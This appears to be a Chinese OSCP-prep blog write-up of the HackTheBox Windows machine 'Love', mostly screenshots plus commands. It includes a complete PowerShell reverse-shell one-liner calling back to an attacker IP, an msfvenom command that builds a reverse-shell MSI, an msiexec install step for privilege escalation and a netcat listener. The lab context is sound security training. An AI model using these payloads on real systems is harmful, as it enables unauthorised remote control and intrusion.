OSCP备考_0x57_HackThBox靶机_Windows_Love

Ethan医生7个月前靶场283

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)

image.png

绑定域名 

http://10.129.48.103/

image.png

image.png

Vote Admin Creds admin: @LoveIsInTheAir!!!! 

http://love.htb/admin/index.php

image.png

查找漏洞,上传文件

http://love.htb/admin/voters.php

image.png

image.png

然后反弹SHELL


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.43',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


image.png

image.png

使用 msfvenom(Kali Linux)生成反向 Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.43 LPORT=6666 -f msi -o evil.msi

或直接使用 msiexec 执行命令(如添加管理员用户):

msiexec /quiet /qn /i evil.msi 

rlwrap -cAr nc -lvnp 6666

image.png

标签: OSCP

相关文章

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。